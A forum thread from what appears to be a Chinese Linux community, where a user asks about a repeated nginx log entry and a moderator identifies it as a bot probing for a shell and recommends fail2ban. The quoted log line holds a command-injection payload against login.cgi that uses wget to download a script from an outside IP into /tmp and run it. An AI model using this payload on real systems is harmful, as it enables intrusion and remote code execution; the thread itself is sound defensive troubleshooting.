请问这是在做什么?

漏洞扫描、网关、防火墙、补丁升级、数据备份和迁移、系统故障排除
回复
drop
帖子: 10
注册时间: 2018-05-26 19:54
送出感谢: 4 次
接收感谢: 0

请问这是在做什么?

#1

帖子 drop » 2018-06-18 19:56

69.26.18.100 - - [18/Jun/2018:18:43:30 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.
190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HT
TP/1.1" 301 178 "-" "Hello, World"
nginx的access.log里从早到晚都是它的记录,已经好几天了,ip地址每次都不一样,已经禁了它的UA,但每天还是能看到它的记录,没事吧?该如何解决?
头像
astolia
论坛版主
帖子: 3295
注册时间: 2008-09-18 13:11
送出感谢: 1 次
接收感谢: 552 次

Re: 请问这是在做什么?

#2

帖子 astolia » 2018-06-19 22:08

bot在扫漏洞尝试拿shell而已 https://twitter.com/txalin/status/1007625620090707974
这种我一般都是用fail2ban封若干小时ip
这些用户感谢了作者 astolia 于这个帖子:
drop (2018-06-20 19:57)
评价: 3.7%
回复

回到 “服务器维护和硬件相关”